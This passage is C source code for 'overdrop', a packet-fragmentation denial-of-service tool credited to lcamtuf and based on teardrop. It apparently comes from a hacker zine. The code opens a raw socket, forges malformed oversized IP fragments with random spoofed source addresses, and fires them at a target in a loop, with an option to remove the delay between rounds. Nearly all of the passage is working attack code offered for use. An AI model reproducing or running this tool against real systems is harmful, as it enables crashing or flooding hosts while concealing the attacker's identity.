  if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,
      sizeof(struct sockaddr))==-1) {
    perror("\nsendto");
    free(packet);
    exit(1);
  }
  /* --- fragment 2: same buffer, total length 24, flags/offset 0xFFFF --- */
  p_ptr=&packet[2];
  *((u_short *)p_ptr)=htons(IPH+MAGIC+1);
  p_ptr+=4;
  *((u_short *)p_ptr)=htons(FRAG2);
  if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,
      sizeof(struct sockaddr))==-1) {
    perror("\nsendto");
    free(packet);
    exit(1);
  }
  free(packet);
}


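/*
 * overdrop entry point: "dst_ip [-n how_many] [-s src_ip] [-x]".
 *
 * Opens a raw IP socket with IP_HDRINCL and calls send_frags() `count`
 * times (COUNT = 0xBEEF when -n is absent or 0), pausing `lag`
 * microseconds between rounds (500, or 0 with -x).  Without -s every
 * round uses a fresh random source address; the source and destination
 * ports are random every round in either case.
 *
 * Changes from the original: the argument check and option parsing run
 * before the raw socket is opened, so usage errors do not need root; the
 * destination is read from argv[optind] after getopt so options may
 * precede it; the random values come from random(), the generator that
 * srandom() actually seeds (the original seeded srandom() but drew from
 * rand(), which the C standard does not tie to it); -n must not be
 * negative; the socket is closed on exit.
 *
 * random() yields 31 bits, so one byte of each spoofed source address
 * never has its top bit set (on a little-endian host the last octet);
 * the original had the same property through rand().
 */
int main(int argc, char **argv) {
  int one = 1, count = 0, opt, round, rip_sock, lag = 500;
  u_long src_ip = 0, dst_ip = 0;
  long val;
  char *end;
  struct in_addr addr;

  fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
  if (argc < 2) usage(argv[0]);

  while ((opt = getopt(argc, argv, "s:n:x")) != -1) {
    switch (opt) {
      case 'n':
        val = strtol(optarg, &end, 10);
        if (*optarg == '\0' || *end != '\0' || val < 0 || (long)(int)val != val) {
          fprintf(stderr, "-n needs a non-negative number, got %s\n", optarg);
          exit(1);
        }
        count = (int)val;
        break;
      case 's':
        if (!(src_ip = name_resolve(optarg))) {
          fprintf(stderr,"Can't resolve source address.\n");
          exit(1);
        }
        break;
      case 'x':        /* express delivery: no pause between rounds */
        lag = 0;
        break;
      default:
        usage(argv[0]);
        break;
    }
  }

  /* the destination follows whatever options getopt consumed */
  if (argc - optind < 1) usage(argv[0]);
  if (!(dst_ip = name_resolve(argv[optind]))) {
    fprintf(stderr,"Can't resolve destination address.\n");
    exit(1);
  }

  if ((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    perror("raw socket");
    exit(1);
  }
  /* we supply the IP header ourselves */
  if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) {
    perror("IP_HDRINCL");
    exit(1);
  }

  srandom((unsigned)(time((time_t)0)));
  if (!count) count = COUNT;

  fprintf(stderr,"Sending oversized packets:\nFrom: ");
  if (!src_ip) {
    fprintf(stderr,"       (random)");
  } else {
    addr.s_addr = src_ip;
    fprintf(stderr,"%15s",inet_ntoa(addr));
  }
  addr.s_addr = dst_ip;
  fprintf(stderr,"\n  To: %15s\n",inet_ntoa(addr));
  fprintf(stderr," Amt: %5d\n",count);
  fprintf(stderr,"[ ");
  for (round = 0; round < count; round++) {
    /* spoof a new source each round unless -s pinned one */
    u_long src = src_ip ? src_ip : (u_long)random();
    send_frags(rip_sock, src, dst_ip, (u_short)random(), (u_short)random());
    fprintf(stderr, "b00z ");
    usleep(lag);
  }
  fprintf(stderr, "]\n");
  close(rip_sock);
  return (0);
}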

-------------------------------Corta

------------------------------------------------------------------------------

<<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>>